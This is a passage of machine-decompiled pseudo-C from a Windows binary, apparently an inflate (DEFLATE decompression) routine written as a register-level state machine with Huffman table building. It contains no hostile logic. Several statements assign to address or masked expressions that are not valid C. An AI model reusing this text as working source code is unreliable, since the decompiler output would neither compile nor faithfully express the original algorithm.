                                                							 &(__esi[0x148]) =  &(__esi[0x144]);
                                                							__eax = 0;
                                                							 *(__ebp - 8) = 0;
                                                							__eax =  &(__esi[3]);
                                                							 *__edi = 7;
                                                							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
                                                							if(__eax != 0) {
                                                								L72:
                                                								 *__esi = 0x11;
                                                								while(1) {
                                                									L180:
                                                									_t396 =  *_t446;
                                                									if(_t396 > 0xf) {
                                                										break;
                                                									}
                                                									L1:
                                                									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
                                                										case 0:
                                                											L101:
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[5];
                                                											__esi[2] = __esi[5];
                                                											 *__esi = 1;
                                                											goto L102;
                                                										case 1:
                                                											L102:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L105:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L103:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L104:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L106:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __ecx;
                                                											if(__ecx != 0) {
                                                												L108:
                                                												__eflags = __cl & 0x00000010;
                                                												if((__cl & 0x00000010) == 0) {
                                                													L110:
                                                													__eflags = __cl & 0x00000040;
                                                													if((__cl & 0x00000040) == 0) {
                                                														goto L125;
                                                													}
                                                													L111:
                                                													__eflags = __cl & 0x00000020;
                                                													if((__cl & 0x00000020) == 0) {
                                                														goto L9;
                                                													}
                                                													L112:
                                                													 *__esi = 7;
                                                													goto L180;
                                                												}
                                                												L109:
                                                												__esi[2] = __ecx;
                                                												__esi[1] = __eax;
                                                												 *__esi = 2;
                                                												goto L180;
                                                											}
                                                											L107:
                                                											__esi[2] = __eax;
                                                											 *__esi = 6;
                                                											goto L180;
                                                										case 2:
                                                											L113:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L116:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L114:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L115:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L117:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											__eax = __esi[4] & 0x000000ff;
                                                											__esi[3] = __esi[4] & 0x000000ff;
                                                											__eax = __esi[6];
                                                											__esi[2] = __esi[6];
                                                											 *__esi = 3;
                                                											goto L118;
                                                										case 3:
                                                											L118:
                                                											__eax = __esi[3];
                                                											while(1) {
                                                												L121:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L119:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L120:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L122:
                                                											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                											__eax = __eax &  *(__ebp - 0x40);
                                                											__ecx = __esi[2];
                                                											__eax = __esi[2] + __eax * 4;
                                                											__ecx =  *(__eax + 1) & 0x000000ff;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
                                                											__ecx =  *__eax & 0x000000ff;
                                                											__eflags = __cl & 0x00000010;
                                                											if((__cl & 0x00000010) == 0) {
                                                												L124:
                                                												__eflags = __cl & 0x00000040;
                                                												if((__cl & 0x00000040) != 0) {
                                                													goto L9;
                                                												}
                                                												L125:
                                                												__esi[3] = __ecx;
                                                												__ecx =  *(__eax + 2) & 0x0000ffff;
                                                												__esi[2] = __eax;
                                                												goto L180;
                                                											}
                                                											L123:
                                                											__esi[2] = __ecx;
                                                											__esi[3] = __eax;
                                                											 *__esi = 4;
                                                											goto L180;
                                                										case 4:
                                                											L126:
                                                											__eax = __esi[2];
                                                											while(1) {
                                                												L129:
                                                												__eflags = __ebx - __eax;
                                                												if(__ebx >= __eax) {
                                                													break;
                                                												}
                                                												L127:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L128:
                                                												__ecx =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                												__ecx = __ebx;
                                                												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L130:
                                                											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                											__ecx = __eax;
                                                											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                											__ebx = __ebx - __eax;
                                                											__eflags = __ebx;
                                                											 *__esi = 5;
                                                											goto L131;
                                                										case 5:
                                                											L131:
                                                											__eax =  *(__ebp - 0x30);
                                                											__edx = __esi[3];
                                                											__eax = __eax - __esi;
                                                											__ecx = __eax - __esi - 0x1ba0;
                                                											__eflags = __eax - __esi - 0x1ba0 - __edx;
                                                											if(__eax - __esi - 0x1ba0 >= __edx) {
                                                												__ecx = __eax;
                                                												__ecx = __eax - __edx;
                                                												__eflags = __ecx;
                                                											} else {
                                                												__esi[0x26e8] = __esi[0x26e8] - __edx;
                                                												__ecx = __esi[0x26e8] - __edx - __esi;
                                                												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
                                                											}
                                                											__eflags = __esi[1];
                                                											 *(__ebp - 0x20) = __ecx;
                                                											if(__esi[1] != 0) {
                                                												L135:
                                                												__edi =  *(__ebp - 0x2c);
                                                												do {
                                                													L136:
                                                													__eflags = __edi;
                                                													if(__edi != 0) {
                                                														goto L152;
                                                													}
                                                													L137:
                                                													__edi = __esi[0x26e8];
                                                													__eflags = __eax - __edi;
                                                													if(__eax != __edi) {
                                                														L143:
                                                														__esi[0x26ea] = __eax;
                                                														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                														__eax = __esi[0x26ea];
                                                														__ecx = __esi[0x26e9];
                                                														__eflags = __eax - __ecx;
                                                														 *(__ebp - 0x30) = __eax;
                                                														if(__eax >= __ecx) {
                                                															__edi = __esi[0x26e8];
                                                															__edi = __esi[0x26e8] - __eax;
                                                															__eflags = __edi;
                                                														} else {
                                                															__ecx = __ecx - __eax;
                                                															__edi = __ecx - __eax - 1;
                                                														}
                                                														__edx = __esi[0x26e8];
                                                														__eflags = __eax - __edx;
                                                														 *(__ebp - 8) = __edx;
                                                														if(__eax == __edx) {
                                                															__edx =  &(__esi[0x6e8]);
                                                															__eflags = __ecx - __edx;
                                                															if(__ecx != __edx) {
                                                																__eax = __edx;
                                                																__eflags = __eax - __ecx;
                                                																 *(__ebp - 0x30) = __eax;
                                                																if(__eax >= __ecx) {
                                                																	__edi =  *(__ebp - 8);
                                                																	__edi =  *(__ebp - 8) - __eax;
                                                																	__eflags = __edi;
                                                																} else {
                                                																	__ecx = __ecx - __eax;
                                                																	__edi = __ecx;
                                                																}
                                                															}
                                                														}
                                                														__eflags = __edi;
                                                														if(__edi == 0) {
                                                															goto L183;
                                                														} else {
                                                															goto L152;
                                                														}
                                                													}
                                                													L138:
                                                													__ecx = __esi[0x26e9];
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx == __edx) {
                                                														goto L143;
                                                													}
                                                													L139:
                                                													__eax = __edx;
                                                													__eflags = __eax - __ecx;
                                                													if(__eax >= __ecx) {
                                                														__edi = __edi - __eax;
                                                														__eflags = __edi;
                                                													} else {
                                                														__ecx = __ecx - __eax;
                                                														__edi = __ecx;
                                                													}
                                                													__eflags = __edi;
                                                													if(__edi == 0) {
                                                														goto L143;
                                                													}
                                                													L152:
                                                													__ecx =  *(__ebp - 0x20);
                                                													 *__eax =  *__ecx;
                                                													__eax = __eax + 1;
                                                													__ecx = __ecx + 1;
                                                													__edi = __edi - 1;
                                                													__eflags = __ecx - __esi[0x26e8];
                                                													 *(__ebp - 0x30) = __eax;
                                                													 *(__ebp - 0x20) = __ecx;
                                                													 *(__ebp - 0x2c) = __edi;
                                                													if(__ecx == __esi[0x26e8]) {
                                                														__ecx =  &(__esi[0x6e8]);
                                                														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
                                                													}
                                                													_t357 =  &(__esi[1]);
                                                													 *_t357 = __esi[1] - 1;
                                                													__eflags =  *_t357;
                                                												} while ( *_t357 != 0);
                                                											}
                                                											goto L23;
                                                										case 6:
                                                											L156:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__edi =  *(__ebp - 0x30);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L172:
                                                												__cl = __esi[2];
                                                												 *__edi = __cl;
                                                												__edi = __edi + 1;
                                                												__eax = __eax - 1;
                                                												 *(__ebp - 0x30) = __edi;
                                                												 *(__ebp - 0x2c) = __eax;
                                                												goto L23;
                                                											}
                                                											L157:
                                                											__ecx = __esi[0x26e8];
                                                											__eflags = __edi - __ecx;
                                                											if(__edi != __ecx) {
                                                												L163:
                                                												__esi[0x26ea] = __edi;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edi = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edi - __ecx;
                                                												 *(__ebp - 0x30) = __edi;
                                                												if(__edi >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edi;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edi;
                                                													__eax = __ecx - __edi - 1;
                                                												}
                                                												__edx = __esi[0x26e8];
                                                												__eflags = __edi - __edx;
                                                												 *(__ebp - 8) = __edx;
                                                												if(__edi == __edx) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __ecx - __edx;
                                                													if(__ecx != __edx) {
                                                														__edi = __edx;
                                                														__eflags = __edi - __ecx;
                                                														 *(__ebp - 0x30) = __edi;
                                                														if(__edi >= __ecx) {
                                                															__eax =  *(__ebp - 8);
                                                															__eax =  *(__ebp - 8) - __edi;
                                                															__eflags = __eax;
                                                														} else {
                                                															__ecx = __ecx - __edi;
                                                															__eax = __ecx;
                                                														}
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L172;
                                                												}
                                                											}
                                                											L158:
                                                											__eax = __esi[0x26e9];
                                                											__edx =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edx;
                                                											if(__eax == __edx) {
                                                												goto L163;
                                                											}
                                                											L159:
                                                											__edi = __edx;
                                                											__eflags = __edi - __eax;
                                                											if(__edi >= __eax) {
                                                												__ecx = __ecx - __edi;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edi;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L172;
                                                											} else {
                                                												goto L163;
                                                											}
                                                										case 7:
                                                											L173:
                                                											__eflags = __ebx - 7;
                                                											if(__ebx > 7) {
                                                												__ebx = __ebx - 8;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                												_t380 = __ebp - 0x38;
                                                												 *_t380 =  *(__ebp - 0x38) - 1;
                                                												__eflags =  *_t380;
                                                											}
                                                											goto L175;
                                                										case 8:
                                                											L4:
                                                											while(_t425 < 3) {
                                                												if( *(_t448 - 0x34) == 0) {
                                                													goto L182;
                                                												} else {
                                                													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                													_t425 = _t425 + 8;
                                                													continue;
                                                												}
                                                											}
                                                											_t425 = _t425 - 3;
                                                											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                											asm("sbb ecx, ecx");
                                                											_t408 = _t406 >> 1;
                                                											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                											if(_t408 == 0) {
                                                												L24:
                                                												 *_t446 = 9;
                                                												_t436 = _t425 & 0x00000007;
                                                												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                												_t425 = _t425 - _t436;
                                                												goto L180;
                                                											}
                                                											L6:
                                                											_t411 = _t408 - 1;
                                                											if(_t411 == 0) {
                                                												L13:
                                                												__eflags =  *0x432e90;
                                                												if( *0x432e90 != 0) {
                                                													L22:
                                                													_t412 =  *0x40a5e8; // 0x9
                                                													_t446[4] = _t412;
                                                													_t413 =  *0x40a5ec; // 0x5
                                                													_t446[4] = _t413;
                                                													_t414 =  *0x431d0c; // 0x0
                                                													_t446[5] = _t414;
                                                													_t415 =  *0x431d08; // 0x0
                                                													_t446[6] = _t415;
                                                													L23:
                                                													 *_t446 =  *_t446 & 0x00000000;
                                                													goto L180;
                                                												} else {
                                                													_t26 = _t448 - 8;
                                                													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                													__eflags =  *_t26;
                                                													_t416 = 0x431d10;
                                                													goto L15;
                                                													L20:
                                                													 *_t416 = _t438;
                                                													_t416 = _t416 + 4;
                                                													__eflags = _t416 - 0x432190;
                                                													if(_t416 < 0x432190) {
                                                														L15:
                                                														__eflags = _t416 - 0x431f4c;
                                                														_t438 = 8;
                                                														if(_t416 > 0x431f4c) {
                                                															__eflags = _t416 - 0x432110;
                                                															if(_t416 >= 0x432110) {
                                                																__eflags = _t416 - 0x432170;
                                                																if(_t416 < 0x432170) {
                                                																	_t438 = 7;
                                                																}
                                                															} else {
                                                																_t438 = 9;
                                                															}
                                                														}
                                                														goto L20;
                                                													} else {
                                                														E0040755C(0x431d10, 0x120, 0x101, 0x4084e8, 0x408528, 0x431d0c, 0x40a5e8, 0x432610, _t448 - 8);
                                                														_push(0x1e);
                                                														_pop(_t440);
                                                														_push(5);
                                                														_pop(_t419);
                                                														memset(0x431d10, _t419, _t440 << 2);
                                                														_t450 = _t450 + 0xc;
                                                														_t442 = 0x431d10 + _t440;
                                                														E0040755C(0x431d10, 0x1e, 0, 0x408568, 0x4085a4, 0x431d08, 0x40a5ec, 0x432610, _t448 - 8);
                                                														 *0x432e90 =  *0x432e90 + 1;
                                                														__eflags =  *0x432e90;
                                                														goto L22;
                                                													}
                                                												}
                                                											}
                                                											L7:
                                                											_t423 = _t411 - 1;
                                                											if(_t423 == 0) {
                                                												 *_t446 = 0xb;
                                                												goto L180;
                                                											}
                                                											L8:
                                                											if(_t423 != 1) {
                                                												goto L180;
                                                											}
                                                											goto L9;
                                                										case 9:
                                                											while(1) {
                                                												L27:
                                                												__eflags = __ebx - 0x20;
                                                												if(__ebx >= 0x20) {
                                                													break;
                                                												}
                                                												L25:
                                                												__eflags =  *(__ebp - 0x34);
                                                												if( *(__ebp - 0x34) == 0) {
                                                													goto L182;
                                                												}
                                                												L26:
                                                												__eax =  *(__ebp - 0x38);
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                												__ecx = __ebx;
                                                												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                												__ebx = __ebx + 8;
                                                												__eflags = __ebx;
                                                											}
                                                											L28:
                                                											__eax =  *(__ebp - 0x40);
                                                											__ebx = 0;
                                                											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                											 *(__ebp - 0x40) = 0;
                                                											__eflags = __eax;
                                                											__esi[1] = __eax;
                                                											if(__eax == 0) {
                                                												goto L53;
                                                											}
                                                											L29:
                                                											_push(0xa);
                                                											_pop(__eax);
                                                											goto L54;
                                                										case 0xa:
                                                											L30:
                                                											__eflags =  *(__ebp - 0x34);
                                                											if( *(__ebp - 0x34) == 0) {
                                                												goto L182;
                                                											}
                                                											L31:
                                                											__eax =  *(__ebp - 0x2c);
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												L48:
                                                												__eflags = __eax -  *(__ebp - 0x34);
                                                												if(__eax >=  *(__ebp - 0x34)) {
                                                													__eax =  *(__ebp - 0x34);
                                                												}
                                                												__ecx = __esi[1];
                                                												__eflags = __ecx - __eax;
                                                												__edi = __ecx;
                                                												if(__ecx >= __eax) {
                                                													__edi = __eax;
                                                												}
                                                												__eax = E00405FE8( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                												_t80 =  &(__esi[1]);
                                                												 *_t80 = __esi[1] - __edi;
                                                												__eflags =  *_t80;
                                                												if( *_t80 == 0) {
                                                													L53:
                                                													__eax = __esi[0x145];
                                                													L54:
                                                													 *__esi = __eax;
                                                												}
                                                												goto L180;
                                                											}
                                                											L32:
                                                											__ecx = __esi[0x26e8];
                                                											__edx =  *(__ebp - 0x30);
                                                											__eflags = __edx - __ecx;
                                                											if(__edx != __ecx) {
                                                												L38:
                                                												__esi[0x26ea] = __edx;
                                                												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
                                                												__edx = __esi[0x26ea];
                                                												__ecx = __esi[0x26e9];
                                                												__eflags = __edx - __ecx;
                                                												 *(__ebp - 0x30) = __edx;
                                                												if(__edx >= __ecx) {
                                                													__eax = __esi[0x26e8];
                                                													__eax = __esi[0x26e8] - __edx;
                                                													__eflags = __eax;
                                                												} else {
                                                													__ecx = __ecx - __edx;
                                                													__eax = __ecx - __edx - 1;
                                                												}
                                                												__edi = __esi[0x26e8];
                                                												 *(__ebp - 0x2c) = __eax;
                                                												__eflags = __edx - __edi;
                                                												if(__edx == __edi) {
                                                													__edx =  &(__esi[0x6e8]);
                                                													__eflags = __edx - __ecx;
                                                													if(__eflags != 0) {
                                                														 *(__ebp - 0x30) = __edx;
                                                														if(__eflags >= 0) {
                                                															__edi = __edi - __edx;
                                                															__eflags = __edi;
                                                															__eax = __edi;
                                                														} else {
                                                															__ecx = __ecx - __edx;
                                                															__eax = __ecx;
                                                														}
                                                														 *(__ebp - 0x2c) = __eax;
                                                													}
                                                												}
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													goto L183;
                                                												} else {
                                                													goto L48;
                                                												}
                                                											}
                                                											L33:
                                                											__eax = __esi[0x26e9];
                                                											__edi =  &(__esi[0x6e8]);
                                                											__eflags = __eax - __edi;
                                                											if(__eax == __edi) {
                                                												goto L38;
                                                											}
                                                											L34:
                                                											__edx = __edi;
                                                											__eflags = __edx - __eax;
                                                											 *(__ebp - 0x30) = __edx;
                                                											if(__edx >= __eax) {
                                                												__ecx = __ecx - __edx;
                                                												__eflags = __ecx;
                                                												__eax = __ecx;
                                                											} else {
                                                												__eax = __eax - __edx;
                                                												__eax = __eax - 1;
                                                											}
                                                											__eflags = __eax;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__eax != 0) {
                                                												goto L48;
                                                											} else {
                                                												goto L38;
                                                											}
                                                										case 0xb:
                                                											goto L56;
                                                										case 0xc:
                                                											L60:
                                                											__esi[1] = __esi[1] >> 0xa;
                                                											__eax = (__esi[1] >> 0xa) + 4;
                                                											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                												goto L68;
                                                											}
                                                											goto L61;
                                                										case 0xd:
                                                											while(1) {
                                                												L93:
                                                												__eax = __esi[1];
                                                												__ecx = __esi[2];
                                                												__edx = __eax;
                                                												__eax = __eax & 0x0000001f;
                                                												__edx = __edx >> 5;
                                                												__eax = __edx + __eax + 0x102;
                                                												__eflags = __esi[2] - __eax;
                                                												if(__esi[2] >= __eax) {
                                                													break;
                                                												}
                                                												L73:
                                                												__eax = __esi[0x143];
                                                												while(1) {
                                                													L76:
                                                													__eflags = __ebx - __eax;
                                                													if(__ebx >= __eax) {
                                                														break;
                                                													}
                                                													L74:
                                                													__eflags =  *(__ebp - 0x34);
                                                													if( *(__ebp - 0x34) == 0) {
                                                														goto L182;
                                                													}
                                                													L75:
                                                													__ecx =  *(__ebp - 0x38);
                                                													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                													__ecx = __ebx;
                                                													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                													__ebx = __ebx + 8;
                                                													__eflags = __ebx;
                                                												}
                                                												L77:
                                                												__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
                                                												__eax = __eax &  *(__ebp - 0x40);
                                                												__ecx = __esi[0x144];
                                                												__eax = __esi[0x144] + __eax * 4;
                                                												__edx =  *(__eax + 1) & 0x000000ff;
                                                												__eax =  *(__eax + 2) & 0x0000ffff;
                                                												__eflags = __eax - 0x10;
                                                												 *(__ebp - 0x14) = __eax;
                                                												if(__eax >= 0x10) {
                                                													L79:
                                                													__eflags = __eax - 0x12;
                                                													if(__eax != 0x12) {
                                                														__eax = __eax + 0xfffffff2;
                                                														 *(__ebp - 8) = 3;
                                                													} else {
                                                														_push(7);
                                                														 *(__ebp - 8) = 0xb;
                                                														_pop(__eax);
                                                													}
                                                													while(1) {
                                                														L84:
                                                														__ecx = __eax + __edx;
                                                														__eflags = __ebx - __eax + __edx;
                                                														if(__ebx >= __eax + __edx) {
                                                															break;
                                                														}
                                                														L82:
                                                														__eflags =  *(__ebp - 0x34);
                                                														if( *(__ebp - 0x34) == 0) {
                                                															goto L182;
                                                														}
                                                														L83:
                                                														__ecx =  *(__ebp - 0x38);
                                                														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                														__ecx = __ebx;
                                                														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                														__ebx = __ebx + 8;
                                                														__eflags = __ebx;
                                                													}
                                                													L85:
                                                													__ecx = __edx;
                                                													__ebx = __ebx - __edx;
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                													__edx =  *(__ebp - 8);
                                                													__ebx = __ebx - __eax;
                                                													__edx =  *(__ebp - 8) + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                													__ecx = __eax;
                                                													__eax = __esi[1];
                                                													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                													__ecx = __esi[2];
                                                													__eax = __eax >> 5;
                                                													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                													__eax = __eax & 0x0000001f;
                                                													__eax = __edi + __eax + 0x102;
                                                													__edi = __edx + __ecx;
                                                													__eflags = __edx + __ecx - __eax;
                                                													if(__edx + __ecx > __eax) {
                                                														goto L9;
                                                													}
                                                													L86:
                                                													__eflags =  *(__ebp - 0x14) - 0x10;
                                                													if( *(__ebp - 0x14) != 0x10) {
                                                														L89:
                                                														__edi = 0;
                                                														__eflags = 0;
                                                														L90:
                                                														__eax = __esi + 0xc + __ecx * 4;
                                                														do {
                                                															L91:
                                                															 *__eax = __edi;
                                                															__ecx = __ecx + 1;
                                                															__eax = __eax + 4;
                                                															__edx = __edx - 1;
                                                															__eflags = __edx;
                                                														} while (__edx != 0);
                                                														__esi[2] = __ecx;
                                                														continue;
                                                													}
                                                													L87:
                                                													__eflags = __ecx - 1;
                                                													if(__ecx < 1) {
                                                														goto L9;
                                                													}
                                                													L88:
                                                													__edi =  *(__esi + 8 + __ecx * 4);
                                                													goto L90;
                                                												}
                                                												L78:
                                                												__ecx = __edx;
                                                												__ebx = __ebx - __edx;
                                                												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                												__ecx = __esi[2];
                                                												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                												__esi[2] = __esi[2] + 1;
                                                											}
                                                											L94:
                                                											__eax = __esi[1];
                                                											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                											__edi = __eax;
                                                											__eax = __eax >> 5;
                                                											__edi = __edi & 0x0000001f;
                                                											__ecx = 0x101;
                                                											__eax = __eax & 0x0000001f;
                                                											__edi = __edi + 0x101;
                                                											__eax = __eax + 1;
                                                											__edx = __ebp - 0xc;
                                                											 *(__ebp - 0x14) = __eax;
                                                											 &(__esi[0x148]) = __ebp - 4;
                                                											 *(__ebp - 4) = 9;
                                                											__ebp - 0x18 =  &(__esi[3]);
                                                											 *(__ebp - 0x10) = 6;
                                                											__eax = E0040755C( &(__esi[3]), __edi, 0x101, 0x4084e8, 0x408528, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                											__eflags =  *(__ebp - 4);
                                                											if( *(__ebp - 4) == 0) {
                                                												__eax = __eax | 0xffffffff;
                                                												__eflags = __eax;
                                                											}
                                                											__eflags = __eax;
                                                											if(__eax != 0) {
                                                												goto L9;
                                                											} else {
                                                												L97:
                                                												__ebp - 0xc =  &(__esi[0x148]);
                                                												__ebp - 0x10 = __ebp - 0x1c;
                                                												__eax = __esi + 0xc + __edi * 4;
                                                												__eax = E0040755C(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x408568, 0x4085a4, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                												__eflags = __eax;
                                                												if(__eax != 0) {
                                                													goto L9;
                                                												}
                                                												L98:
                                                												__eax =  *(__ebp - 0x10);
                                                												__eflags =  *(__ebp - 0x10);
                                                												if( *(__ebp - 0x10) != 0) {
                                                													L100:
